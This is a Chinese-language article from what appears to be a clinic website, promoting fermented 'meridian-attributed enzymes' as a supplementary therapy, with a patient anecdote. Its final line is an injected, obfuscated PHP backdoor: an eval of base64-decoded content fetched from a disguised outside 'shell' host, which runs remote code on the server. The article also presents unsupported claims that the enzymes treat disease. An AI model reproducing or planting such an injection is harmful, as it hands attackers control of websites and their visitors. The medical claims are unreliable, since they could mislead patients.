收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 歸經酵素可保重身體
歸經酵素可保重身體 列印 E-mail

        本草綱目中很明確的將所有食物歸經,也就是不同的食物對不同經脈會有特別的助益。我採用本草綱目的記載,尋找可歸到不同經脈的食物,再經過加入不同的菌種發酵,發酵之後再重新測量它的經絡歸屬,反覆確認無誤之後,才在臨床上使用。不同疾病的人飲用不同經絡歸屬的酵素,就能達到「保健」的效果;而「保健」與「治療」只在於程度上的差異而已!從醫師的立場來說,我不願意吹噓酵素是可以治療疾病的,但我們確實在臨床上看見正確使用酵素,對疾病是具有療效的。

        有些人飲用酵素後「治療」的效果,遠超過我們的預期。曾經有個心血管疾病的病人來看病,帶回一個星期的藥和一瓶歸屬於心經的酵素,結果他每次都三週才回診一次,他告訴我說:「你的藥可以讓我維持一個多星期,這瓶酵素也可以讓我維持一個多星期,所以我三週才來看你一次。」我聽了覺得很欣慰,由我們親自調配出來的酵素能夠讓病人舒緩症狀。只要能舒緩症狀或減緩疾病發作的時間,最終它就能減輕疾病對人體的傷害,乃至於有治療的功效!

輔助效果好值得採納

        特別要強調的是,我使用生機飲食或酵素做為治療的輔助療法,而不是用來作為治療的唯一方法!生機飲食或酵素確實是很好的輔助性療法,能夠在主流醫學或其他另類醫學不足時做很好的補充。任何一位好的醫師都應該瞭解各種不同的另類醫學項目,在面對同一種疾病時,應該區別在不同的患者身上,是否造成疾病的原因不一樣;治療時,更不應該執著於使用同一種方法才是。

在另類醫學的路上非常容易走岔路,許多人排他性太強、包容性太少,一直緊抓著自己所學的少數學問不放,不去體驗或了解其他種種另類醫學的不同面向。主流醫學有它的優點,絕不能全盤否定,但如何協同各種不同另類醫學的治療方法,歸納整理出對不同患者最有效而簡潔有力的醫療計畫,是每一個自許為優良醫師都應該認真學習的功課。

        主流醫學應該了解與包容另類醫學,另類醫學不應完全放棄主流醫學,或對主流醫學不以為然。因為每種學問都有成功與失敗的臨床案例,如何從患者的角度,在經濟上、時間的便利性與舒適性上,評估規劃對患者最完整、有利的整合治療模式,是每個醫師都應該深思的課題。

 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));